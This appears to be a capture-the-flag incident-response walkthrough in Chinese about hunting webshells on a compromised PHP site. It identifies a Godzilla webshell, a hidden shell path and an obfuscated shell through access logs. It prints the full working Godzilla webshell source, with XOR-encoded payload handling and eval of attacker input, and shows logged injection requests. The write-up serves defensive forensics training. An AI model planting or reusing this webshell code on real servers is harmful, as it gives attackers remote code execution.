跳到主要内容

第一章 应急响应 - webshell 查杀

1

黑客 webshell 里面的 flag

将网站源码下载到本地进行分析

img

查看相关文件,发现

/var/www/html/include/gz.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
$data=encode($data,$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo encode(@run($data),$key);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2

黑客使用的什么工具的 shell github 地址的 md5

/var/www/html/include/gz.php 文件为哥斯拉的 webshell

https://github.com/BeichenDream/Godzilla --> 39392de3218c333f794befef07ac9257
flag{39392de3218c333f794befef07ac9257}

3

黑客隐藏 shell 的完整路径的 md5

/var/www/html/include/Db/.Mysqli.php --> aebac0e58cd6c5fad1695ee4d1ac1919
flag{aebac0e58cd6c5fad1695ee4d1ac1919}

4

黑客免杀马完整路径 md5

查看 access.log 即可

(remote) root@ip-10-0-10-2:/var/www/html/include/Db# cat /var/log/apache2/access.log | awk '{print $7}' | uniq
......
/shell.php
/wap/index.php?1=phpinfo();
/wap/template/images/mobile.css
/wap/template/images/time.gif
/wap/template/images/logo.gif
/wap/index.php?1=phpinfo();
/shell.php
/wap/index.php?1=phpinfo();
/shell.php
/wap/top.php?1=phpinfo();
/shell.php
/wap/top.php?fuc=ERsDHgEUC1hI&func2=ser
/wap/top.php?fuc=ERsDHgEUC1hI&func2=sert
/shell.php
/var/www/html/wap/top.php --> eeff2eabfd9b7a6d26fc1a53d3f7d1de
flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}